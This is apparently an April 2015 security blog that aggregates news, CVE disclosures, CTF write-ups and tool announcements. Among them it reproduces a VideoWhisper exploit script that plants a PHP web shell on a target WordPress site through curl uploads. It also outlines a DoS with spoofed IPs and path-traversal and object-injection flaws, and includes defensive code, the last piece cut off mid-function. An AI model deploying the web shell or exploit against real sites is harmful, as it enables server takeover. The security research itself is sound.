Monday, April 20, 2015

Table Top Exercises (TTX)

“Table Top Exercises” (TTX) has become part of my almost daily vocabulary given how hot the demand for them has become. From the companies and individuals I spoke with, there were a variety of reasons they were looking for a TTX, but it ultimately boiled down to the following three buckets:

1. The Information Security organization had no Incident Response (IR) capability at all and wanted to demonstrate to leadership the perils of what would happen.

2. The CISO wanted to ensure their Incident Response Team (IRT) had all their bases covered during an incident.

3. A savvy and mature IRT wanted to include outside organizations such as Legal, Human Resources, Public Relations, Office of the CIO, Office of the CEO, etc… so that everyone had gone through a drill at least once.

more here.......

Null Pointer Dereferencing Causes Undefined Behavior

I have unintentionally raised a large debate recently concerning the question if it is legal in C/C++ to use the &P->m_foo expression with P being a null pointer. The programmers' community divided into two camps. The first claimed with confidence that it wasn't legal while the others were as sure saying that it was. Both parties gave various arguments and links, and it occurred to me at some point that I had to make things clear. For that purpose, I contacted Microsoft MVP experts and Visual C++ Microsoft development team communicating through a closed mailing list. They helped me to prepare this article and now everyone interested is welcome to read it.

more here.......

Finding Every Vulnerable App in the App Store

You know there's a security flaw hidden in over 100,000 iOS apps out of the 1.4 million total, but which ones are actually vulnerable? How would you find out?

SourceDNA is constantly scanning apps from the app stores, analyzing and indexing their binary code. This lets us search for apps by their behavior and the tools & libraries they were built with.

AFNetworking recently had a major security flaw. Due to lack of SSL cert validation, the proverbial coffee shop attacker could easily bypass SSL and see all your app's user credentials and banking data. We decided to track down apps that were still using the vulnerable version of AFNetworking and notify their developers so they could patch the flaw.

more here.....

Paper: The Spy in the Sandbox -- Practical Cache Attacks in Javascript

We present the first micro-architectural side-channel attack which runs entirely in the browser. In contrast to other works in this genre, this attack does not require the attacker to install any software on the victim's machine -- to facilitate the attack, the victim needs only to browse to an untrusted webpage with attacker-controlled content. This makes the attack model highly scalable and extremely relevant and practical to today's web, especially since most desktop browsers currently accessing the Internet are vulnerable to this attack. Our attack, which is an extension of the last-level cache attacks of Yarom et al., allows a remote adversary to recover information belonging to other processes, other users and even other virtual machines running on the same physical host as the victim web browser. We describe the fundamentals behind our attack, evaluate its performance using a high bandwidth covert channel and finally use it to construct a system-wide mouse/network activity logger. Defending against this attack is possible, but the required countermeasures can exact an impractical cost on other benign uses of the web browser and of the computer.

more here.......

Heap visualization tool release

Visualization of heap operations tool here......
CTF quality code. Useful for (small) heap feng shui!


ViDi Visual Disassembler 0.2 Release

The latest release of this tool for static analysis of PE files based on bearparser & capstone here.....

Windows Event Log message strings support

For those of you following log2timeline-dev@ you might already know that the development version of plaso now has support to output Windows Event Log message strings. So now instead of having to rely on other tools or manually looking up every event identifier on you can enjoy having full Windows Event log message strings in your timeline.

How to use here.....

Speaking of Government Backdoors

After Alex Stamos’ stand off with Admiral Mike Rogers, I got to thinking about what the Admiral must be saying when he insisted that government “front doors” were technically possible to create in a way that didn’t give them ultimate access. Then a story came out about a split-key approach that is being studied. Let me explain to you why that is a bad idea and propose a technically less dangerous one.

more here........

Denial-of-service Attack – DoS using hping3 with spoofed IP in Kali Linux

In computing, a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, the motives for, and targets of a DoS attack vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet. In this article I will show how to carry out a Denial-of-service Attack or DoS using hping3 with spoofed IP in Kali Linux.

more here.......

Bypassing Packet Filters with IP Fragmentation Overlapping

The process of IP fragmentation occurs when the data of the network layer is too large to be transmitted over the data link layer in one piece. Then the data of the network layer is split into several pieces (fragments), and this process is called IP fragmentation. The intention of this article is to present how IP fragmentation could be used by the attacker to bypass packet filters (IP fragmentation overlapping attack). Finally, it is shown how this attack can be prevented by stateful inspection.

more here........

Without a Trace: Fileless Malware Spotted in the Wild

Improvements in security file scanners are causing malware authors to deviate from the traditional malware installation routine. It’s no longer enough for malware to rely on dropping copies of themselves to a location specified in the malware code and using persistence tactics like setting up an autostart feature to ensure that they continue to run. Security file scanners can easily block and detect these threats.

A tactic we have spotted would be using fileless malware. Unlike most malware, fileless malware hides itself in locations that are difficult to scan or detect. Fileless malware exists only in memory and is written directly to RAM instead of being installed on the target computer’s hard drive. POWELIKS is an example of fileless malware that is able to hide its malicious code in the Windows Registry. These use a conventional malware file to add the entries with its malicious code in the registry.

more here......

Update on the Beebone Botnet Takedown

On April 8, the takedown operation for the polymorphic botnet known as Beebone successfully concluded. This action redirected traffic from infected hosts to a sinkhole operated by the Shadowserver Foundation. In addition to halting additional infections and the continued morphing of the W32/Worm-AAEH worm, the sinkhole allows McAfee Labs and other partners in the takedown to better understand the scope and complexity of the Beebone operation. We now have a more accurate count of infected hosts, we have identified additional indicators of compromise, and we have greater visibility into the botnet’s geographic reach.

more here.........


Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB attacks, VLAN pivoting, or even restrictions from the client.

more here.........

Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/SMB.

Hacker Demonstrates iOS 8.4 Jailbreak

Quite surprisingly, the just-released beta of Apple’s iOS 8.4 has been jailbroken by a well-known hacker.
Yes, the first beta of iOS 8.4 released by Apple to developers last week has been jailbroken by Stefan Esser, commonly known as "i0n1c" in the jailbreak community.

more here.......

PwC: The Sofacy plot thickens

There has been some recent news regarding further activities of a group variously described as Sofacy[1]. We are releasing this flash bulletin containing network indicators to aid security professionals in detecting this activity.

more here......

Sptoolkit (Simple Phishing Toolkit Project) Rebirth

sptoolkit hasn't been actively developed for two years. As it stands, it's a brilliant piece of software, and the original developers are pretty damn awesome for creating it. But we'd like to go further, and bring sptoolkit up to date. We've tried contacting the developers, but to no avail. We're taking matters into our own hands now. Want to help?
more here......

More on TeslaCrypt: Videogame Safety 101

TeslaCrypt is a piece of Ransomware which encrypts your data and locks it behind a “Pay up some serious cash or no files for you” series of messages designed to inspire fear and a liberal slice of money being thrown at the TFT.

Recently, it’s been showing up in Malware scams involving Nuclear EK (exploit kit).

more here.........

New VMware open-source tools make Docker safe for the enterprise

VMware has been threatened by Docker containers, but a bold new move embraces and extends them

read more here.......

Patching a Null Pointer Access Violation

An application was crashing about five times a day, so crash dumps were enabled via the registry.

Looking at the dmp files, the program always crashed at the same point in the program here......

Experimental Use of 64-bit Dump of 32-bit .NET Process in WinDbg

A .NET dmp file is typically best captured as 32-bit for a 32-bit process. On an x64 system this could be done using the 32-bit task manager (C:\windows\syswow64\taskmgr.exe), WinDbg (x86), or a tool like ProcDump ( )

However, what if a 32-bit .NET process has already been captured in a 64-bit dmp file, and the issue is really hard to reproduce?

more here.........

Introducing a cross-platform debugger for Go

This tool was introduced on the 4th of this month but here is an additional article published today.....

Security Advisory: XSS Vulnerability Affecting Multiple WordPress Plugins

Multiple WordPress Plugins are vulnerable to Cross-site Scripting (XSS) due to the misuse of the add_query_arg() and remove_query_arg() functions. These are popular functions used by developers to modify and add query strings to URLs within WordPress.

The official WordPress documentation (Codex) for these functions was not very clear and misled many plugin developers into using them in an insecure way. The developers assumed that these functions would escape the user input for them, when they do not. This simple detail caused many of the most popular plugins to be vulnerable to XSS.

more here.....

TCP load balancing code

TCP load balancing code from Nginx Plus is now available publicly here......

The power of DNS rebinding: stealing WiFi passwords with a website

DNS rebinding attacks have long been known as useful tools in the hands of attackers for subverting the browser Same-origin policy. The attack abuses DNS, changing the IP address of a website after serving the page contents, usually with some ad-hoc Javascript payload, tricking the browser into waiting some time for the DNS cache to invalidate and then performing other requests, still believing it is connecting to the same host, while in reality it is now communicating with a new IP chosen by the attacker. As a result, the attacker can access internal services, exfiltrate information and do other nasty stuff.

Ready-made proof of concept tools exist and mitigations are hard to deploy and not always effective (for example, DNS pinning is not a panacea and dnswall only filters out private IP addresses in DNS response, protecting from just some attacks).

read more here........

Playing with Content-Type – XXE on JSON Endpoints

Many web and mobile applications rely on web services communication for client-server interaction. Most common data formats for web services are XML, whether SOAP or RESTful, and JSON. While a web service may be programmed to use just one of them, the server may accept data formats that the developers did not anticipate. This may result in JSON endpoints being vulnerable to XML External Entity attacks (XXE), an attack that exploits weakly configured XML parser settings on the server.

XXE is a well-known attack against XML endpoints. To exploit it, external entity declarations are included in the XML payload, and the server expands the entities, potentially resulting in read access to the web server’s file system, remote file system access via UNC paths, or connections to arbitrary hosts over HTTP/HTTPS.

more here..........

Update from initial story: Researcher denied flight after tweet poking United security

United Airlines stopped a prominent security researcher from boarding a California-bound flight late Saturday, following a social media post by the researcher days earlier suggesting the airline's onboard systems could be hacked.

more here.......

.bashrc PS1 generator

Generate your .bashrc PS1 prompt easily with a drag and drop interface

more here.......


A simple tool that allows you to execute javascript in the command line as if you were in a browser. Built on-top of PhantomJS and acts as a well-behaved unix tool.

Wait, isn't this just NodeJS? No, they are for different things. BooJS gives you the full DOM, you can call document in BooJS and import arbitrary browser javascript libraries.

more here.......

Using Z3 theorem prover to prove equivalence of some bizarre alternative to XOR operation.

There is a program called "A Hacker's Assistant" (Aha!) written by Henry Warren, who is also the author of the great "Hacker's Delight" book.

The Aha! program is essentially a superoptimizer, which blindly brute-forces sequences of generic RISC CPU instructions to find the shortest possible (and jumpless or branch-free) code sequence for a desired operation.

One of the impressive examples of its work is the discovery of Dietz's formula, which is code for computing the average of two numbers without overflow (important if you want to average numbers like 0xFFFFFF00 and so on using 32-bit registers).

more here.......

PlaidDB - pwn 550 & PlaidCTF 2015 EBP challenge

PlaidDB is an x64 stripped executable, compiled with full RELRO, PIE and NX support. Its libc was provided, seemingly from Ubuntu LTS 14.04. It manages key-value pairs which one can add, update, retrieve or delete.

more here........

This pwnable challenge was essentially an echo server. Anything we sent to it was sent right back to us. The code was really simple, and there was no NX on the binary which meant we could execute shellcode on the stack. et0x and I quickly found that it was vulnerable to a format string attack when snprintf() was called in the make_response() function:

more here......

Handling Special PDF Compression Methods

Maarten Van Horenbeeck posted a diary entry (July 2008) explaining how scripts and data are stored in PDF documents (using streams), and demonstrated a Perl script to decompress streams. A couple of months before, I had started developing my pdf-parser tool, and Maarten's diary entry motivated me to continue adding features to pdf-parser.

more here......

Fiesta Exploit Kit Spreading Crypto-Ransomware – Who Is Affected?

Exploit kits have long been used to deliver threats to users, but they seem to have gone retro: one was recently seen delivering fake antivirus malware.

We closely monitor exploit kit activity because of their widespread use (we discussed their use in malvertising recently), so it was no great surprise to see the Fiesta exploit kit being used to deliver crypto-ransomware. The choice of exploits delivered is broadly in line with other exploit kits. Flash, Internet Explorer, Adobe Reader/Acrobat, and Silverlight are all targeted. (It’s worth noting that as is the case in recent attacks, Java is no longer a favored infection vector).

more here.........

Threat language parser

tlp is a python library that parses a body of text for indicators of compromise (iocs), leveraging the amazing textblob and nltk natural language processing modules to derive context and color around those iocs. The goal of tlp is to allow security analysts and researchers to extract and store meaningful data from the endless stream of information they encounter daily, without the tedium of endless ctrl+c, ctrl+v workflow.

To solve this problem, tlp uses a combination of regular expressions, part-of-speech tagging, list filters, and simple statistical analysis to extract the following data from narrative-style prose:

document summary
indicators of compromise, with associated stats
key words and phrases, with associated stats
parser debugging information

more here.........

Failed Apple Rootpipe Fix Leaves Backdoor On All Macs, Researchers Claim

When Apple released the latest version of Mac OS X Yosemite earlier this month, it claimed to have fixed a significant flaw, a backdoor named Rootpipe, that had been resident on its computers since 2011. But, due to some uncodified Apple policy on patching, anyone running an operating system below 10.10 remained vulnerable, leaving tens of millions with documented weaknesses in their PCs. And, according to researchers, Apple botched the patch anyway, so all Mac machines remain vulnerable to Rootpipe attacks.

more here........

Laravel - PHP Object Injection - 4.1, 4.2, 5.0, master

If you're using cookie-based session storage with any version of the
Laravel Framework since 4.1 (inclusive), and you turned encryption off (I
can't imagine why anyone would do that, but I've seen some weird setups),
you are vulnerable to PHP Object Injection.

The story begins here:

No matter which driver you select, it calls buildSession():

If encryption is turned off, it creates an instance of the Store class,
which contains this gem:

    /**
     * Read the session data from the handler.
     *
     * @return array
     */
    protected function readFromHandler()
    {
        $data = $this->handler->read($this->getId());

        if ($data) {
            $data = @unserialize($this->prepareForUnserialize($data));

            if ($data !== false) return $data;
        }

        return [];
    }

For the record, prepareForUnserialize() just returns whatever you pass it.

If you're using the CookieSessionHandler without encryption, you're
allowing the client to arbitrarily change the session contents. While
that's bad in and of itself, that Laravel passes this data to unserialize()
is even worse.

When I informed Taylor Otwell on their Slack chat about this and
recommended a fix, this is what he had to say:

> we will consider it, however, since encryption is on in laravel
> i wouldn't view it as a security issue

I didn't find any exploitable flaws in their encryption implementation. I
might look again soon.

The takeaway: If any Laravel developers are reading this: If you have
foregone server-side session storage, please make sure you have encryption
turned on.

Scott Arciszewski
Chief Development Officer
Paragon Initiative Enterprises <>
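To make the point of the report concrete, here is an added example (not Laravel's code, and not part of the post above) contrasting a session read that hands the raw cookie to unserialize() with one that verifies an HMAC tag before touching the payload. The cookie values and key are constructed for the demo, and the HMAC stand-in only illustrates the kind of check Laravel's encrypter performs, not its implementation; it assumes PHP 7.1 or later.

```php
<?php
// Added example, not Laravel's code: a cookie-backed session is only safe
// to unserialize() if the server can tell that it minted the cookie.
declare(strict_types=1);

// Constructed sample: a cookie value the client wrote itself. Nothing here
// came from the server, yet it is a perfectly valid serialized array.
$forgedByClient = serialize(['user_id' => 1, 'is_admin' => true]);

/**
 * The pattern from the report: the cookie body goes straight into
 * unserialize(). The client controls every key of the session, and any
 * autoloadable class with __wakeup()/__destruct() becomes reachable.
 */
function readSessionUnauthenticated(string $cookie): array
{
    $data = @unserialize($cookie);
    return is_array($data) ? $data : [];
}

/**
 * Hardened stand-in (illustrative, not Laravel's encrypter): the server
 * attaches an HMAC when it writes the cookie and refuses to touch the
 * payload unless the tag verifies.
 */
function writeSessionAuthenticated(array $session, string $key): string
{
    $payload = base64_encode(serialize($session));
    return $payload . '.' . hash_hmac('sha256', $payload, $key);
}

function readSessionAuthenticated(string $cookie, string $key): array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return [];                       // not something this server produced
    }
    [$payload, $tag] = $parts;
    // hash_equals() is constant-time; a plain === would leak how many tag
    // bytes matched.
    if (!hash_equals(hash_hmac('sha256', $payload, $key), $tag)) {
        return [];
    }
    $raw = base64_decode($payload, true);
    if ($raw === false) {
        return [];
    }
    // Authenticated, but still forbid object instantiation: a session of
    // scalars and arrays never needs allowed_classes.
    $data = @unserialize($raw, ['allowed_classes' => false]);
    return is_array($data) ? $data : [];
}

$key = 'constructed-demo-key-do-not-reuse';

// 1. Unauthenticated read: the forged cookie is accepted as the session.
var_dump(readSessionUnauthenticated($forgedByClient)['is_admin']);

// 2. Authenticated read: the same forged cookie carries no valid tag, so
//    the session comes back empty.
var_dump(readSessionAuthenticated($forgedByClient, $key));

// 3. A genuine cookie whose payload was edited after minting: the tag no
//    longer matches, so the flipped is_admin flag is never seen by the app.
$genuine = writeSessionAuthenticated(['user_id' => 1, 'is_admin' => false], $key);
[$payload, $tag] = explode('.', $genuine, 2);
$edited = base64_encode(str_replace('b:0;', 'b:1;', base64_decode($payload)));
var_dump(readSessionAuthenticated($edited . '.' . $tag, $key));

// 4. The untouched genuine cookie round-trips.
var_dump(readSessionAuthenticated($genuine, $key)['is_admin']);
```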

Tinfoil Chat CEV- encryption plugin for Pidgin IM client

TFC-CEV is a high assurance encryption plugin for the Pidgin IM client, built on free and open source hardware and software. Its secure-by-design implementation protects data in transit against passive and active attacks, as well as the end points against untasked targeted attacks practiced by TLAs such as the NSA, GCHQ and BKA.

more here.........

Sunday, April 19, 2015

Pharaoh - PHAR Comparison Tool

A tool to compare executable PHP Archives (.phar files) here.....

Previously, there wasn't a tool available that specifically worked with
.phar files, which differ from just a .zip or .tar in that they have an
executable stub which allows you to do something like this:

    include "vendor/acme/deliverable.phar";
    $foo = \Acme\Deliverable\Foo();

Pharaoh is useful for open source projects that distribute a .phar
(phpunit, composer, etc.). Since many of these projects do not sign their
.phar, if their server gets hacked it would be trivial to slip in a bit of
extra code in the stub (add a public key to ~/.ssh/authorized_keys, etc).

The idea is that someone can download the .phar from their website, build
the same one from source, then use Pharaoh to compare them and detect this
malicious tampering. (And then, hopefully, blow the whistle to disrupt the

Authored by Scott Arciszewski
Chief Development Officer
Paragon Initiative Enterprises <>
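An added example, not Pharaoh's own code and not part of the post above, of the comparison the post describes: it fingerprints two .phar files with PHP's built-in Phar class (the executable stub plus a SHA-256 per member file) and reports where a downloaded archive diverges from one built from source. The two paths are placeholders supplied on the command line, and the way the member name is derived from the phar:// path is an assumption about how PHP reports it.

```php
<?php
// Added example, not Pharaoh's code: compare a downloaded .phar with one
// built from source by diffing the stub and every member file's content hash.
declare(strict_types=1);

/**
 * Collect what can differ between two archives built from the same source:
 * the executable stub (which runs before anything else) and a SHA-256 of
 * each member file's contents, keyed by its path inside the archive.
 */
function pharFingerprint(string $path): array
{
    $phar = new Phar($path);            // read access works with phar.readonly=1
    $files = [];
    // Assumption: member paths are reported as phar://<absolute path>/<member>.
    $base = 'phar://' . realpath($path) . '/';
    foreach (new RecursiveIteratorIterator($phar) as $info) {
        /** @var PharFileInfo $info */
        $full = $info->getPathname();
        $rel = strncmp($full, $base, strlen($base)) === 0 ? substr($full, strlen($base)) : $full;
        $files[$rel] = hash('sha256', (string) file_get_contents($full));
    }
    ksort($files);
    return ['stub' => $phar->getStub(), 'files' => $files];
}

/**
 * Returns a list of human-readable differences; an empty list means the two
 * archives have the same stub and identical member contents.
 */
function comparePhars(string $downloaded, string $fromSource): array
{
    $a = pharFingerprint($downloaded);
    $b = pharFingerprint($fromSource);
    $diff = [];

    // A planted payload usually lands in the stub, so check it first.
    if ($a['stub'] !== $b['stub']) {
        $diff[] = 'stub differs';
    }
    foreach (array_keys(array_diff_key($a['files'], $b['files'])) as $name) {
        $diff[] = "only in downloaded archive: $name";
    }
    foreach (array_keys(array_diff_key($b['files'], $a['files'])) as $name) {
        $diff[] = "only in source build: $name";
    }
    foreach (array_intersect_key($a['files'], $b['files']) as $name => $hash) {
        if ($hash !== $b['files'][$name]) {
            $diff[] = "content differs: $name";
        }
    }
    return $diff;
}

// Usage (paths are placeholders): php compare.php downloaded.phar build/from-source.phar
if (PHP_SAPI === 'cli' && isset($argv[2])) {
    $diff = comparePhars($argv[1], $argv[2]);
    echo $diff ? implode(PHP_EOL, $diff) . PHP_EOL : 'archives match' . PHP_EOL;
    exit($diff ? 1 : 0);
}
```

A non-zero exit with "stub differs" is the case the post warns about: the archive you downloaded does not run the same bootstrap code as the one you built yourself.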

gr-nacl- GNU Radio module for data encryption using NaCl library

The gr-nacl module for GNU Radio provides functionality from the NaCl crypto library implemented with the fork libsodium (see section 'Dependency' for more information). This contains public-key and secret-key encryption. The difference is explained, e.g., on Wikipedia [0]. The implementation is based on encryption of messages, which are passed in GNU Radio via the message system. Check out the GNU Radio documentation for further information [1]. Furthermore, a byte stream encryption method via tagged streams is implemented.

The functionality can be tested with the example flowgraphs for GNU Radio Companion at the subfolder examples/ or directly with the provided test-cases for ctest.

more here........

libxml2 issue found in Shopify: out-of-bounds memory access when parsing an unclosed HTML comment

This is an out-of-bounds memory access in libxml2. When given an unclosed HTML comment such as <!-- the libxml2 parser didn't stop parsing at the end of the buffer, causing random memory to be included in the parsed comment that was returned to Ruby. In Shopify, this caused Ruby objects from previous HTTP requests to be disclosed in the rendered page.

more here.........

Slides: An overview of PDF potential leaks

Awareness about preventing information leaks via PDFs, with PoCs, here.....

afl-fuzz fixup shim, pdflex (Minimal and hacky PDF lexer), Crashwalk, Francis, Terry and Gootool

afl-fuzz fixup shim is a skeleton to fixup tests for afl-fuzz >= 1.52. I've used a Go fixer, but it should work for any language more here......

pdflex here.......

Crashwalk Bucket and triage on-disk crashes. OSX and Linux here....

Francis LLDB engine based tool to instrument OSX apps and triage crashes here....

Terry Wrap radamsa on OSX, add instrumentation / triage here.....

and Gootool Silly PoC of a limited otool clone based on the capstone disassembly lib here.....

jQuery considered harmful

Heh, I always wanted to do one of those “X considered harmful” posts.

Before I start, let me say that I think jQuery has helped tremendously to move the Web forward. It gave developers power to do things that were previously unthinkable, and pushed the browser manufacturers to implement these things natively (without jQuery we probably wouldn’t have document.querySelectorAll now). And jQuery is still needed for those that cannot depend on the goodies we have today and have to support relics of the past like IE8 or worse.

However, as much as I feel for these poor souls, they are the minority. There are tons of developers that don’t need to support old browsers with a tiny market share. And let’s not forget those who aren’t even Web professionals: Students and researchers not only don’t need to support old browsers, but can often get by just supporting a single browser! You would expect that everyone in academia would be having tons of fun using all the modern goodies of the Open Web Platform, right? And yet, I haven’t seen jQuery being so prominent anywhere else as much as it is in academia. Why? Because this is what they know, and they really don’t have the time or interest to follow the news on the Open Web Platform. They don’t know what they need jQuery for, so they just use jQuery anyway. However, being able to do these things natively now is not the only reason I’d rather avoid jQuery.

more here.......


Mimosa Framework to abuse EPC functionality on CISCO Routers here.........

VolDiff: Malware Memory Footprint Analysis

VolDiff is a bash script that runs Volatility plugins against memory images captured before and after malware execution. It creates a report that highlights system changes.

VolDiff is a simple yet powerful malware analysis tool that enables malware analysts to quickly identify IOCs and understand advanced malware behaviour.

more here........

Saturday, April 18, 2015

Operation RussianDoll: Adobe & Windows Zero-Day Exploits Likely Leveraged by Russia’s APT28 in Highly-Targeted Attack

FireEye Labs recently detected a limited APT campaign exploiting zero-day vulnerabilities in Adobe Flash and a brand-new one in Microsoft Windows. Using the Dynamic Threat Intelligence Cloud (DTI), FireEye researchers detected a pattern of attacks beginning on April 13th, 2015. Adobe independently patched the vulnerability (CVE-2015-3043) in APSB15-06. Through correlation of technical indicators and command and control infrastructure, FireEye assesses that APT28 is probably responsible for this activity.

Microsoft is aware of the outstanding local privilege escalation vulnerability in Windows (CVE-2015-1701). While there is not yet a patch available for the Windows vulnerability, updating Adobe Flash to the latest version will render this in-the-wild exploit innocuous. We have only seen CVE-2015-1701 in use in conjunction with the Adobe Flash exploit for CVE-2015-3043. The Microsoft Security Team is working on a fix for CVE-2015-1701.

Exploit overview here..........

A Million Lines of Bad Code

This is the story of some bad code I wrote here......

ScratchABit Incremental Disassembler

ScratchABit is an interactive incremental disassembler with data/control
flow analysis capabilities. ScratchABit is dedicated to the efforts of
the OpenSource reverse engineering community (reverse engineering to
produce OpenSource drivers/firmware for hardware not properly supported
by vendors).

The email that's watching you (Inclusive video demonstrating exploitation of IBM iNotes with BeEF using CVE-2014-0913)

Cross-site Scripting (XSS) is probably the most common security vulnerability in web applications. Nevertheless, the impact of XSS is still seriously underestimated by many people and even major companies. The CVE-scores given for Cross-Site Scripting issues are low on average. But an adversary doesn't care about scores if Cross-site Scripting vulnerabilities will make his dreams come true.

The impact of Cross-site Scripting in webmail applications does not differ from those in regular web applications. However, mail infrastructure is a top-notch target for a Cross-Site Scripting (XSS) attack.

We released a paper that explains why Cross-Site Scripting in webmail applications is a serious issue.

more here.......

Malware Database

DarkComet, adWind, CyberGate and more here......

Exploit for VideoWhisper WP plugins file upload incomplete fix

#A quick Exploit for the VideoWhisper file upload incomplete fix I posted a few weeks ago.
#Larry W. Cashdollar v1.0

cat > shell.pht << -EOF-
        echo "<pre>";
        \$cmd = (\$_REQUEST[‘cmd’]);
        echo "</pre>";
} else { echo "Please supply a command cmd"; }

NC='\033[0m' # No Color

while [ true ]; do 
echo -e ${red};
echo -e "                               VideoWhisper Remote File Upload PoC Redux $NC";
echo "                                          4/14/2015";
echo "                                     Larry W. Cashdollar, @_larry0";
echo "Linux OSs like Debian or Ubuntu have .phtml, .pht defined as";
echo "SetHandler application/x-httpd-php in php5.conf";
echo "So WP instances hosted on thos OSs are still vulnerable to CVE-2014-1905";
echo "and bid 53851.";
echo "               - Advisories -";
echo "";;
echo "";;
echo "";;
echo "Ctrl ^C to exit";
echo -n "Enter Target Hostname :";
read target;
echo -n "Enter 1 for integration 2 for presentation :";
read plugin;
echo -n "Enter payload filename or (shell.pht):";
read file;
echo "[+] Hostname $target";
echo "[+] File $file";
if [ $plugin == 1 ]; then
echo "[+] Targeting Video Conference Plugin";
        curl --form "vw_file= () $file" --form "name=$file" --form "room=./" 
echo "[+] Targeting Video Presentation Plugin";
        curl --form "vw_file= () $file" --form "name=$file" --form "room=./" 

Critical Magento Shoplift Vulnerability (SUPEE-5344) – Patch Immediately!

The Magento team released a critical security patch (SUPEE-5344) to address a remote command execution (RCE) vulnerability back in February. It’s been more than two months since the release and still more than 50% of all the Magento installations have not been patched, leaving them open to attacks.

This means hundreds of thousands of websites are vulnerable right now; worse yet, they are Ecommerce websites. This means that the websites are being used to sell goods online, capturing personally identifiable information (PII), including credit card information in many cases, for each of their clients. The impact of Magento websites getting compromised can be devastating for every online buyer that uses or has used a website built on the platform.

more here........

Calling back into Python from llvmlite-JITed code

This post is about a somewhat more interesting and complex use of llvmlite than the basic example presented in my previous article on the subject.

I see compilation as a meta-tool. It lets us build new levels of abstraction and expressiveness within our code. We can use it to build additional languages on top of our host language (common for C, C++ and Java-based systems, less common for Python), to accelerate some parts of our host language (more common in Python), or anything in between.

To fully harness the power of runtime compilation (JITing), however, it's very useful to know how to bridge the gap between the host language and the JITed language; preferably in both directions. As the previous article shows, calling from the host into the JITed language is trivial. In fact, this is what JITing is mostly about. But what about the other direction? This is somewhat more challenging, but leads to interesting uses and additional capabilities. here.......

Cyber Security Consolidation: Raytheon to acquire Websense for $1.9 billion

Raytheon Co. agreed to acquire Websense Inc. from private-equity firm Vista Equity Partners LLC for $1.9 billion and plans to combine it with its cyber-products unit, people with knowledge of the matter said.

more here........

Rooting Freshly

Getting started to CTF on Freshly, Scanning the Perimeter

Scanning the Freshly VM with nmap was quick and painless here.............

Threat Spotlight: Upatre – Say No to Drones, Say Yes to Malware

Talos has observed an explosion of malicious downloaders in 2015 which we’ve documented on several occasions on our blog. These downloaders provide a method for attackers to push different types of malware to endpoint systems easily and effectively. Upatre is an example of a malicious downloader Talos has been monitoring since late 2013. However, in the last 24-48 hours, things have shifted dramatically. We’ve monitored at least fifteen different spam campaigns that are active between one and two days. While the topic associated with the spam message has varied over time, the common attachment provided is a compressed file (.zip or .rar) that contains an executable made to look like a PDF document by changing the icon.

more here........

Friday, April 17, 2015

Validate the Encoding Before Passing Strings to Libcurl or Glibc

Opinion: Security firm’s Iran report mostly hype

A new report from the security firm Norse that claims growing Iranian cyberattacks on critical infrastructure relies on questionable data. It's the latest in a string of cybersecurity vendor reports that grab headlines but erode trust in the industry.

more here.........

Cracking Candy Crush

After receiving a lot of interest in Trivia Cracker, a Chrome extension that lets you easily cheat in the popular game Trivia Crack, I decided it might be interesting to see if the same kinds of vulnerabilities existed in other popular games. Given its insane popularity, the first game I thought to investigate, of course, was Candy Crush.

more here..........

CVE-2014-7954 MTP path traversal vulnerability in Android, CVE-2014-7951 adb backup archive path traversal file overwrite & CVE-2014-7953 Android backup agent code execution

1. MTP path traversal vulnerability in Android 4.4

doSendObjectInfo() method of the MtpServer class implemented in
frameworks/av/media/mtp/MtpServer.cpp does not validate the name
parameter of the incoming MTP packet at all.

It is possible to upload files outside of the sdcard using a specially
crafted MTP request:

root () testpc:~/mtp-test# ./mtp-mysend sdf.txt \
libmtp version: 1.1.3

Device 0 (VID=18d1 and PID=4e42) is UNKNOWN.
Please report this VID/PID and the device model to the libmtp
development team
Android device detected, assigning default bug flags
Sending sdf.txt as
Sending file...
Progress: 25 of 25 (100%)
New file ID: 203

The file is written by the process

root () grouper:/data/data/ # ls -la
ls -la
drwxrwx--x u0_a6    u0_a6             2014-07-22 01:06 cache
drwxrwx--x u0_a6    u0_a6             2014-07-22 01:07 databases
lrwxrwxrwx install  install           2014-07-22 01:05 lib ->
-rw-rw-r-- u0_a6    media_rw       13 2014-09-24 01:36 sdf.txt
drwxrwx--x u0_a6    u0_a6             2014-07-22 01:06 shared_prefs

Tested on:     Android 4.4.4
Reported on:   2014-09-26
Assigned CVE:  CVE-2014-7954
Discovered by: Imre Rad / Search-Lab Ltd.

2. ADB backup archive path traversal file overwrite      

Using adb one can create a backup of his/her Android device and store it
on the PC. The backup archive is based on the tar file format.

By modifying tar headers to contain ../../ like patterns it is possible
to overwrite files owned by the system user on writeable partitions.

An example pathname in the tar header:
Tar header checksum must be corrected of course.

When restoring the modified archive the BackupManagerService overwrites
the resolved file name, since the file name is not sanitized.

Bugfix in the version control:!/#F0

Android 5 (Lollipop) and newer versions are not affected (due to the
official bugfix linked above).

Additional conditions for exploiting on pre-Lollipop systems:

- The partition of the destination file must be mounted as writeable (e.g.
/system won't work, but /data does)

- It is not possible to overwrite files owned by root, since the process
doing the restore is running as the same user as the package itself and
Android packages cannot run.

- It is not possible to overwrite files owned by the system user since AOSP
4.3, due to Id6a0cb4c113c2e4a8c4605252cffa41bea22d8a3, which introduced a
new hardening: "... ignoring non-agent system package ".
(If the operating system is custom and there is a system package
available with a full backup agent specified explicitly, then that
custom Android 4.3 and 4.4 might be affected too.)

Pre 4.3 AOSP systems are affected without further conditions: it is
possible to overwrite files owned by the system user or any other
packages installed on the system.

Tested on:      Android 4.0.4
Reported on:    2014-07-14
Assigned CVE:   CVE-2014-7951
Android bug id: 16298491
Discovered by:  Imre Rad / Search-Lab Ltd.
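Both findings above come down to a path component taken from an untrusted source (the MTP object name in section 1, the tar entry name in section 2) reaching the file system without a containment check. The following is an added example in C++, not AOSP code, of the lexical checks a receiver of such input needs; the function names are hypothetical:

```cpp
// Added example (not AOSP code): lexical containment checks for the two
// untrusted path inputs discussed above, an MTP object name from a
// SendObjectInfo packet and an entry name from a tar header in an adb
// backup archive. Function names are hypothetical.
#include <cstddef>
#include <sstream>
#include <string>
#include <vector>

// Split a path on '/'; empty components (from "//" or a leading '/') are
// kept so the caller can see them.
static std::vector<std::string> splitPath(const std::string &path) {
    std::vector<std::string> parts;
    std::string part;
    std::stringstream ss(path);
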